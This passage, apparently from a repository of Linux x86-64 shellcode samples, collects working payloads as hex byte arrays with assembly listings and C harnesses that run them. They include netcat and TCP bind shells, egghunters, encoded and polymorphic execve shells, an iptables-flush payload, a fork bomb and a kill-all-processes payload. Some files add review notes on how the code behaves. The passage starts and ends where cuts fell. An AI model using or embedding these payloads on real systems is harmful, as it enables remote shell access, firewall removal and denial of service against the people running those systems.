ShepherdDowling@gmail.com 11 | // OffSec ID: OS-20614 12 | 13 | // Victim: netstat -an | grep LISTEN | grep tcp 14 | // Attacker: nc 15 | 16 | unsigned char code[] = \ 17 | 18 | #define PORT "\x39\x39" 19 | // Keep to two bytes 20 | 21 | "\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05" 22 | ; 23 | 24 | int main () 25 | { 26 | // I make sure there are no nulls 27 | // The string count will terminate at the first \x00 28 | printf("The Shellcode is %d Bytes Long\n", strlen(code)); 29 | 30 | // Next I throw 0xAAAAAAAA into every register before shellcode execution 31 | // This ensures that the shellcode will run in any circumstance 32 | 33 | __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" 34 | "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 35 | "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 36 | "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 37 | "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" 38 | "call code"); 39 | return 0; 40 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Bind_TCP_Shell__4444_TCP__Shellcode__132_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | linux/x86-64 bindshell(port 4444) 3 | xi4oyu [at] 80sec.com 4 | http://www.80sec.com 5 | 6 | 7 | BITS 64 8 | xor eax,eax 9 | xor ebx,ebx 10 | xor edx,edx 11 | ;socket 12 | mov al,0x1 13 | mov esi,eax 14 | inc al 15 | mov edi,eax 16 | mov dl,0x6 17 | mov al,0x29 18 | syscall 19 | xchg ebx,eax ;store the server sock 20 | ;bind 21 | xor rax,rax 22 | push rax 23 | push 0x5c110102 24 | mov [rsp+1],al 25 | mov rsi,rsp 26 | mov dl,0x10 27 | mov edi,ebx 28 | mov al,0x31 29 | syscall 30 | 
;listen 31 | mov al,0x5 32 | mov esi,eax 33 | mov edi,ebx 34 | mov al,0x32 35 | syscall 36 | ;accept 37 | xor edx,edx 38 | xor esi,esi 39 | mov edi,ebx 40 | mov al,0x2b 41 | syscall 42 | mov edi,eax ; store sock 43 | ;dup2 44 | xor rax,rax 45 | mov esi,eax 46 | mov al,0x21 47 | syscall 48 | inc al 49 | mov esi,eax 50 | mov al,0x21 51 | syscall 52 | inc al 53 | mov esi,eax 54 | mov al,0x21 55 | syscall 56 | ;exec 57 | xor rdx,rdx 58 | mov rbx,0x68732f6e69622fff 59 | shr rbx,0x8 60 | push rbx 61 | mov rdi,rsp 62 | xor rax,rax 63 | push rax 64 | push rdi 65 | mov rsi,rsp 66 | mov al,0x3b 67 | syscall 68 | push rax 69 | pop rdi 70 | mov al,0x3c 71 | syscall 72 | */ 73 | 74 | main() { 75 | char shellcode[] = 76 | "\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" 77 | "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" 78 | "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" 79 | "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" 80 | "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" 81 | "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" 82 | "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" 83 | "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" 84 | "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"; 85 | 86 | (*(void (*)()) shellcode)(); 87 | } 88 | 89 | // milw0rm.com [2009-05-18] -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;The MIT License (MIT) 2 | 3 | ;Copyright (c) 2017 Robert L. 
Taylor 4 | 5 | ;Permission is hereby granted, free of charge, to any person obtaining a 6 | ;copy of this software and associated documentation files (the “Software”), 7 | ;to deal in the Software without restriction, including without limitation 8 | ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 9 | ;and/or sell copies of the Software, and to permit persons to whom the 10 | ;Software is furnished to do so, subject to the following conditions: 11 | 12 | ;The above copyright notice and this permission notice shall be included 13 | ;in all copies or substantial portions of the Software. 14 | 15 | ;The Software is provided “as is”, without warranty of any kind, express or 16 | ;implied, including but not limited to the warranties of merchantability, 17 | ;fitness for a particular purpose and noninfringement. In no event shall the 18 | ;authors or copyright holders be liable for any claim, damages or other 19 | ;liability, whether in an action of contract, tort or otherwise, arising 20 | ;from, out of or in connection with the software or the use or other 21 | ;dealings in the Software. 
22 | ; 23 | ; For a detailed explanation of this shellcode see my blog post: 24 | ; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html 25 | 26 | global _start 27 | 28 | section .text 29 | 30 | _start: 31 | ; Socket 32 | push 41 33 | pop rax 34 | push 2 35 | pop rdi 36 | push 1 37 | pop rsi 38 | cdq 39 | syscall 40 | ; Listen 41 | xor esi,esi 42 | xchg eax,edi 43 | mov al,50 44 | syscall 45 | ; Accept 46 | mov al,43 47 | syscall 48 | ; Dup 2 49 | push 3 50 | pop rsi 51 | xchg edi,eax 52 | dup2loop: 53 | push 33 54 | pop rax 55 | dec esi 56 | syscall 57 | jne dup2loop 58 | ; Execve 59 | ; rax and rsi and rdx are zero already 60 | push rax ; zero terminator for the following string that we are pushing 61 | 62 | ; push /bin//sh in reverse 63 | mov rbx, '/bin//sh' 64 | push rbx 65 | 66 | ; store /bin//sh address in RDI 67 | push rsp 68 | pop rdi 69 | 70 | ; Call the Execve syscall 71 | mov al, 59 72 | syscall -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Egghunter_Shellcode__18_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------------------------------------------------------- 2 | /* 3 | *Title: x86_64 Linux egghunter in 18 bytes 4 | *Author: Sathish kumar 5 | *Contact: https://www.linkedin.com/in/sathish94 6 | *Description: x86_64 linux egghunter which searches for the marker. 7 | *Copyright: (c) 2016 iQube. 
(http://iQube.io) 8 | *Release Date: January 7, 2016 9 | *Tested On: Ubuntu 14.04 LTS 10 | *SLAE64-1408 11 | *Build/Run: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter 12 | * 13 | *Nasm source: 14 | * 15 | * 16 | global _start 17 | 18 | _start: 19 | 20 | egg: 21 | inc rdx ; Address 22 | push rdx ; pushing the value in the rdx to the stack 23 | pop rdi ; sending rdx to rdi via stack 24 | push 0x50905090 ; pusing the egg marker into the stack 25 | pop rax 26 | inc eax ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded 27 | scasd ; check if we have found the egg 28 | jnz egg ; try the next byte in the memory 29 | jmp rdi ; go to the shellcode 30 | 31 | *Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm 32 | ld -o egghunter egghunter.o 33 | */ 34 | 35 | #include 36 | #include 37 | 38 | char hunter[] = \ 39 | "\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7"; 40 | 41 | char execve_code_with_egg[] = \ 42 | //marker 43 | "\x91\x50\x90\x50" 44 | "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; 45 | 46 | int main(){ 47 | printf("Egg Hunter Length: %d\n", (int)strlen(hunter)); 48 | (*(void (*)()) hunter)(); 49 | return 0; 50 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Egghunter_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: x64 Linux egghunter in 24 bytes 3 | ;Author: David Velázquez a.k.a d4sh&r 4 | ;Contact: https://mx.linkedin.com/in/d4v1dvc 5 | ;Description: x64 Linux egghunter that looks for the string "h@ckh@ck" 6 | ; and then execute the shellcode 7 | ;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux 8 | 9 | ;Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm 10 | ; ld 
-o egghunter egghunter.o 11 | ;SLAE64-1379 12 | 13 | global _start 14 | 15 | _start: 16 | pop rax ; some address in the stack 17 | search: 18 | inc rax 19 | cmp [rax - 4] , dword 0x6b634068 ; "h@ck" 20 | jnz search 21 | cmp [rax - 8] , dword 0x6b634068 ; "h@ck" 22 | jnz search 23 | call rax ; execute shellcode 24 | */ 25 | #include 26 | #include 27 | //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 28 | unsigned char hunter[] = "\x58\x48\xff\xc0\x81\x78\xfc\x68\x40\x63\x6b\x75\xf4\x81\x78\xf8\x68\x40\x63\x6b\x75\xeb\xff\xd0"; 29 | unsigned char egg[] = \ 30 | "\x68\x40\x63\x6b" //egg 31 | "\x68\x40\x63\x6b" //egg 32 | "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x0$ 33 | 34 | int main() 35 | 36 | { 37 | 38 | printf("Hunter Length: %d\n", (int)strlen(hunter)); 39 | 40 | (*(void (*)()) hunter)(); 41 | 42 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;The MIT License (MIT) 2 | 3 | ;Copyright (c) 2017 Robert L. Taylor 4 | 5 | ;Permission is hereby granted, free of charge, to any person obtaining a 6 | ;copy of this software and associated documentation files (the “Software”), 7 | ;to deal in the Software without restriction, including without limitation 8 | ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 9 | ;and/or sell copies of the Software, and to permit persons to whom the 10 | ;Software is furnished to do so, subject to the following conditions: 11 | 12 | ;The above copyright notice and this permission notice shall be included 13 | ;in all copies or substantial portions of the Software. 
14 | 15 | ;The Software is provided “as is”, without warranty of any kind, express or 16 | ;implied, including but not limited to the warranties of merchantability, 17 | ;fitness for a particular purpose and noninfringement. In no event shall the 18 | ;authors or copyright holders be liable for any claim, damages or other 19 | ;liability, whether in an action of contract, tort or otherwise, arising 20 | ;from, out of or in connection with the software or the use or other 21 | ;dealings in the Software. 22 | ; 23 | ; For a detailed explanation of this shellcode see my blog post: 24 | ; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html 25 | 26 | global _start 27 | 28 | section .text 29 | 30 | _start: 31 | push 82 32 | pop rax 33 | cdq 34 | push rdx 35 | push word '-F' 36 | push rsp 37 | pop rbx 38 | push rdx 39 | mov rcx, 'iptables' 40 | push rcx 41 | shl al,1 42 | sub al,cl 43 | mov rcx, '//sbin//' 44 | push rcx 45 | push rsp 46 | pop rdi 47 | push rdx 48 | push rbx 49 | push rdi 50 | push rsp 51 | pop rsi 52 | syscall -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | /sbin/iptables -F shellcode for AMD64 (84 bytes) 4 | 5 | By gat3way 6 | 7 | 8 | The code to load the sc[] into an executable mmap()-ed executable page 9 | was shamelessly stolen by hophet (too lazy :)) 10 | Thanks Gustavo C. 
for the inspiration - x86_64 assembly is fun :) 11 | 12 | # Here is the boring assembly code: 13 | # push /sbin/iptables: 14 | movq $0x73656c626174ffff, %rbx 15 | shr $16, %rbx 16 | push %rbx 17 | movq $0x70692f6e6962732f, %rbx 18 | push %rbx 19 | movq %rsp, %rdi 20 | # push params 21 | movq $0x462dffffffffffff,%rbx 22 | shr $48, %rbx 23 | push %rbx 24 | movq %rsp, %rcx 25 | movq $0x46ffffffffffffff,%rbx 26 | shr $56, %rbx 27 | push %rbx 28 | movq %rsp, %rax 29 | xor %rbx, %rbx 30 | push %rbx 31 | push %rcx 32 | push %rax 33 | movq %rsp,%rsi 34 | movq %rsp,%rdx 35 | # execve 36 | xorq %rax,%rax 37 | mov $0x3b,%al 38 | syscall 39 | 40 | 41 | Hm...pak ne moga da izmislia neshto umno :( 42 | 43 | */ 44 | 45 | 46 | 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | #include 54 | #include 55 | 56 | 57 | char sc[]="\x48\xbb\xff\xff" 58 | "\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73\x62" 59 | "\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x48\xbb\xff\xff\xff\xff\xff" 60 | "\xff\x2d\x46\x48\xc1\xeb\x30\x53\x48\x89\xe1\x48\xbb\xff\xff\xff" 61 | "\xff\xff\xff\xff\x46\x48\xc1\xeb\x38\x53\x48\x89\xe0\x48\x31\xdb" 62 | "\x53\x51\x50\x48\x89\xe6\x48\x89\xe2\x48\x31\xc0\xb0\x3b\x0f\x05"; 63 | 64 | void main() 65 | { 66 | void (*p)(); 67 | int fd; 68 | 69 | printf("Lenght: %d\n", strlen(sc)); 70 | fd = open("/tmp/. 
", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); 71 | if (fd < 0) 72 | err(1, "open"); 73 | 74 | write(fd, sc, strlen(sc)); 75 | if ((lseek(fd, 0L, SEEK_SET)) < 0) 76 | err(1, "lseek"); 77 | 78 | p = (void (*)())mmap(NULL, strlen(sc), PROT_READ|PROT_EXEC, MAP_SHARED, fd, 0); 79 | if (p == (void (*)())MAP_FAILED) 80 | err(1, "mmap"); 81 | p(); 82 | return 0; 83 | } 84 | 85 | // milw0rm.com [2008-11-28] -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Fork_Bomb_Shellcode__11_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86_64 - fork() Bomb (11 bytes) 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://twitter.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86_64 7 | ;Description: WARNING! this shellcode may crash your computer if executed 8 | in your system. 9 | ;Shellcode Length: 11 10 | ;Tested on : Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux 11 | 12 | 13 | 14 | ===COMPILATION AND EXECUTION Assemmbly file=== 15 | 16 | #nasm -f elf64 shell.asm -o shell.o <=== Making Object File 17 | 18 | #ld shell.o -o shell <=== Making Binary File 19 | 20 | #./bin2shell.sh shell <== xtract hex code from the binary( 21 | https://github.com/touhidshaikh/bin2shell) 22 | 23 | =================SHELLCODE(INTEL FORMAT)================= 24 | 25 | section .text 26 | global _start: 27 | _start: 28 | xor rax,rax 29 | add rax,57 30 | syscall 31 | jmp _start 32 | 33 | ===================END HERE============================ 34 | 35 | ====================FOR C Compile=========================== 36 | 37 | Compile with gcc with some options. 
38 | 39 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 40 | 41 | */ 42 | 43 | #include 44 | #include 45 | 46 | 47 | unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\xeb\xf5"; 48 | 49 | main() 50 | { 51 | 52 | printf("Shellcode Length: %d\n", (int)strlen(code)); 53 | 54 | int (*ret)() = (int(*)())code; 55 | 56 | ret(); 57 | 58 | } 59 | 60 | /*More Shellcode => Download Link : 61 | https://github.com/touhidshaikh/shellcode/tree/master/Linux */ -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Kill_All_Processes_Shellcode__19_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86_64 - kill() All Processes Shellcode 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://github.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86_64 7 | ;Description: If pid == -1, then sig is sent to every process for which the 8 | calling process has permission to send signals, except for process 1 (init) 9 | ;Shellcode Length: 19 10 | ;Tested on : Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux 11 | 12 | 13 | 14 | ===COMPILATION AND EXECUTION Assemmbly file=== 15 | 16 | #nasm -f elf64 shell.asm -o shell.o <=== Making Object File 17 | 18 | #ld shell.o -o shell <=== Making Binary File 19 | 20 | #./bin2shell.sh shell <== xtract hex code from the binary( 21 | https://github.com/touhidshaikh/bin2shell) 22 | 23 | =================SHELLCODE(INTEL FORMAT)================= 24 | 25 | section .text 26 | global _start: 27 | _start: 28 | xor rax,rax 29 | push byte -1 ; pid = -1, 30 | pop rdi 31 | add rax,9 ; sig 32 | mov rsi,rax 33 | add rax,53 ; kill system call number 9+53=62 34 | syscall 35 | 36 | 37 | ===================END HERE============================ 38 | 39 | ====================FOR C Compile=========================== 40 | 41 | Compile with gcc with some 
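options.

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing

*/

#include <stdio.h>
#include <string.h>

/*
 * kill(-1, SIGKILL): rdi = -1 (every process the caller is allowed to signal,
 * except init), rsi = 9 (SIGKILL), rax = 62 (__NR_kill).  19 bytes, NUL-free.
 * Destructive by design -- with root privileges it also kills the caller's
 * own shell and session; test it in a disposable VM only.
 */
unsigned char code[] =
	"\x48\x31\xc0\x6a\xff\x5f\x48\x83\xc0\x09\x48\x89\xc6\x48\x83\xc0\x35\x0f\x05";

/*
 * Test harness.  strlen() is a valid length only because the payload has no
 * NUL byte.  Jumping into a .data array requires that section to be
 * executable: "-z execstack" gives that only on kernels that still apply
 * READ_IMPLIES_EXEC to x86-64 binaries (Linux 5.8 stopped doing so); on newer
 * kernels copy the bytes into an mmap(PROT_READ|PROT_WRITE|PROT_EXEC) page.
 */
int main(void)
{
	printf("Shellcode Length: %d\n", (int)strlen(code));

	int (*ret)() = (int (*)())code;
	ret();
	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Encoded_Shellcode__57_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*
Compile with: gcc -fno-stack-protector -z execstack
This execve shellcode is encoded with 0xff and is for 64 bit linux.

shell: file format elf64-x86-64


Disassembly of section .text:

0000000000400080 :
  400080:	48 b9 ff ff ff ff ff 	movabs rcx,0xffffffffffffffff
  400087:	ff ff ff
  40008a:	49 b8 ae b7 72 c3 db 	movabs r8,0xfffaf0dbc372b7ae
  400091:	f0 fa ff
  400094:	49 31 c8             	xor    r8,rcx
  400097:	41 50                	push   r8
  400099:	49 b8 d0 9d 96 91 d0 	movabs r8,0x978cd0d091969dd0
  4000a0:	d0 8c 97
  4000a3:	49 31 c8             	xor    r8,rcx
  4000a6:	41 50                	push   r8
  4000a8:	49 b8 b7 ce 2d ad 4f 	movabs r8,0x46b7c44fad2dceb7
  4000af:	c4 b7 46
  4000b2:	49 31 c8             	xor    r8,rcx
  4000b5:	41 50                	push   r8
  4000b7:	ff e4                	jmp    rsp

2015 William Borskey

Review notes:
 - "Encoded with 0xff" is a bitwise NOT (xor with all ones).  The encoded
   qwords are NUL-free; the decoded bytes are not (they end in 0x00).
 - After the three pushes the stack holds, from rsp upwards,
     48 31 d2 52 b0 3b 48 b9 2f 62 69 6e 2f 2f 73 68 51 48 8d 3c 24 0f 05 00
   i.e. xor rdx,rdx ; push rdx ; mov al,0x3b ; movabs rcx,"/bin//sh" ;
   push rcx ; lea rdi,[rsp] ; syscall -- which "jmp rsp" then executes.
 - So the decoded stub runs from the stack (the *target* needs an executable
   stack, not just this harness), leaves rsi (argv) as it found it, and
   "mov al,0x3b" assumes the upper bits of rax are already zero.

*/
char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";

/*
 * Test harness: jumps into the .data array, which must be executable (on
 * Linux 5.8+ "-z execstack" no longer makes .data executable for x86-64;
 * use an mmap(PROT_EXEC) page there).  The function pointer is deliberately
 * left unprototyped: gcc clears eax before calling through an unprototyped
 * pointer, and that is what satisfies the decoded stub's "upper rax is zero"
 * assumption in this test.
 */
int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) shellcode;
	(*func)();
	return 0;
}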
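-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Polymorphic_Shellcode__31_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
/*
;Title: polymorphic execve shellcode
;Author: d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Category: Shellcode
;Architecture:linux x86_64
;SLAE64-1379
;Description:
;Polymorphic shellcode in 31 bytes to get a shell
;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux

;Compilation and execution
;nasm -felf64 shell.nasm -o shell.o
;ld shell.o -o shell
;./shell

global _start

_start:
mul esi                      ; rax = eax*esi, rdx = high half -- both 0 only if eax or esi is 0
push rdx                     ; NUL terminator for the string pushed below
mov al,1
mov rbx, 0xd2c45ed0e65e5edc ;/bin//sh  (rol 24 then shr 1 gives 0x68732f2f6e69622f)
rol rbx,24
shr rbx,1
push rbx
lea rdi, [rsp] ;address of /bin//sh
add al,58                    ; 1+58 = 59 = __NR_execve, assumes the upper bits of rax are 0
syscall                      ; execve(rdi, rsi, rdx) -- rsi is never set, so argv is whatever rsi held

;Review note: the payload relies on rax and rsi being zero on entry.  That is
;true for a freshly exec'd _start (the kernel zeroes the general registers)
;and for the C harness below (gcc clears eax before calling through an
;unprototyped pointer, and rsi still holds main's argv pointer), but not for
;an arbitrary exploit context: if eax*esi != 0 the syscall number is wrong,
;and a non-zero rsi is passed to execve as argv.

*/
#include <stdio.h>
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char code[] = "\xf7\xe6\x52\xb0\x01\x48\xbb\xdc\x5e\x5e\xe6\xd0\x5e\xc4\xd2\x48\xc1\xc3\x18\x48\xd1\xeb\x53\x48\x8d\x3c\x24\x04\x3a\x0f\x05";

/*
 * Test harness: jumps into the .data array, so the data segment must be
 * executable ("-z execstack" only implies that on kernels that still set
 * READ_IMPLIES_EXEC for x86-64, i.e. before Linux 5.8).  Keep the pointer
 * type unprototyped -- that is what zeroes eax for the "mul esi" above.
 */
int main(void)
{
	int (*ret)() = (int (*)()) code;
	ret();
	return 0;
}
-------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: --------------------------------------------------------------------------------
;Title: execve shellcode 22 bytes
;Author: d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Category: Shellcode
;Architecture:linux x86_64
;SLAE64-1379
;Description:
;Shellcode in 22 bytes to get a shell
;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux

;Compilation and execution
;nasm -felf64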
shell.nasm -o shell.o 13 | ;ld shell.o -o shell 14 | ;./shell 15 | 16 | global _start 17 | 18 | _start: 19 | mul esi 20 | push rdx 21 | mov rbx, 0x68732f2f6e69622f ;/bin//sh 22 | push rbx 23 | lea rdi, [rsp] ;address of /bin//sh 24 | mov al, 59 ;execve 25 | syscall 26 | 27 | /*compile with gcc -fno-stack-protector -z exestack */ 28 | 29 | unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"; 30 | 31 | main() 32 | { 33 | int (*ret)()=(int(*)()) code; 34 | ret(); 35 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Stack_Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------------------------------------------------------- 2 | /* 3 | *Title: x86_64 linux Polymorphic execve-stack 47 bytes 4 | *Author: Sathish kumar 5 | *Contact: https://www.linkedin.com/in/sathish94 6 | * Copyright: (c) 2016 iQube. 
(http://iQube.io) 7 | * Release Date: January 6, 2016 8 | *Description: X86_64 linux Polymorphic execve-stack 47 bytes 9 | *Tested On: Ubuntu 14.04 LTS 10 | *SLAE64-1408 11 | *Build/Run: gcc -fno-stack-protector -z execstack sellcode.c -o shellcode 12 | * ./shellcode 13 | * 14 | global _start 15 | 16 | _start: 17 | 18 | xor esi, esi 19 | xor r15, r15 20 | mov r15w, 0x161f 21 | sub r15w, 0x1110 22 | push r15 23 | mov r15, rsp 24 | mov rdi, 0xff978cd091969dd0 25 | inc rdi 26 | neg rdi 27 | mul esi 28 | add al, 0x3b 29 | push rdi 30 | push rsp 31 | pop rdi 32 | call r15 33 | */ 34 | 35 | 36 | #include 37 | #include 38 | 39 | unsigned char code[] = \ 40 | "\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7"; 41 | main() 42 | { 43 | 44 | printf("Shellcode Length: %d\n", (int)strlen(code)); 45 | 46 | int (*ret)() = (int(*)())code; 47 | 48 | ret(); 49 | 50 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_XOR_NOT_DIV_Encoded_Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------------------------------------------------------- 2 | /* 3 | *Title: x86_64 linux-Xor/not/div encoded execve shellcode 4 | *Author: Sathish kumar 5 | *Contact: https://www.linkedin.com/in/sathish94 6 | * Copyright: (c) 2016 iQube. 
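(http://iQube.io)
* Release Date: January 6, 2016
*Description: X86_64 linux-Xor/not/div encoded execve shellcode 54 bytes
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
* ./bindshell
*
*  (the build line appears to be copied from a bind-shell file; substitute
*   this file's name -- the payload below is a plain execve("/bin//sh"))
*/
/*
global _start
section .text
_start:


jmp short call_shellcode


decoder:
pop rdi
xor rcx, rcx
xor rdx, rdx
xor rax, rax
mov cl, 26

decode:
not byte [rdi] ; not function is appplied
xor byte [rdi], 0xee ; xor function with 0xee
mov rax, rdi ; multiplication is done
mov ecx, 0x2
mul ecx
mov rdi, rax
inc rdi
loop decode ; loop continues until the shellcode size is completed

jmp short shellcode_to_decode ; Pointed to the decoded shellcode

call_shellcode:
call decoder
shellcode_to_decode: db 0x35,0x09,0x6a,0x35,0x6a,0x62,0x22,0x39,0x35,0x4c,0x06,0x20,0x25,0x26,0x06,0x06,0x28,0x25,0x38,0x3b,0x3e,0x24,0x0c,0x3d,0x16,0x13

Review note: the listing above does NOT match the bytes in code[] below.
Disassembling code[] gives this decoder:

  eb 15              jmp  short call_shellcode
decoder:
  5f                 pop  rdi             ; rdi -> encoded bytes
  48 31 c9           xor  rcx, rcx
  b1 1a              mov  cl, 26
decode:
  80 37 ee           xor  byte [rdi], 0xee
  f6 17              not  byte [rdi]
  80 2f 03           sub  byte [rdi], 3
  48 ff c7           inc  rdi
  e2 f3              loop decode
  eb 05              jmp  short shellcode_to_decode
call_shellcode:
  e8 e6 ff ff ff     call decoder

Each byte is transformed xor 0xee -> not -> sub 3; there is no mul/div (the
"mov rax,rdi / mul ecx / mov rdi,rax" in the listing would double the pointer
and fault).  Decoding the 26 bytes yields:

  48 31 f6                        xor  rsi, rsi        ; argv = NULL
  48 f7 e6                        mul  rsi             ; rax = rdx = 0 (envp = NULL)
  66 50                           push ax              ; two zero bytes: string terminator
  48 bb 2f 62 69 6e 2f 2f 73 68   movabs rbx, "/bin//sh"
  53                              push rbx
  54                              push rsp
  5f                              pop  rdi             ; filename
  6a 3b                           push 0x3b
  58                              pop  rax             ; __NR_execve
  0f 05                           syscall

Because the decoder rewrites its payload in place, the bytes must sit in
memory that is both writable and executable (a .data array, as below; a
string literal in .rodata would fault on the first write).
*/

#include <stdio.h>
#include <string.h>

unsigned char code[] =
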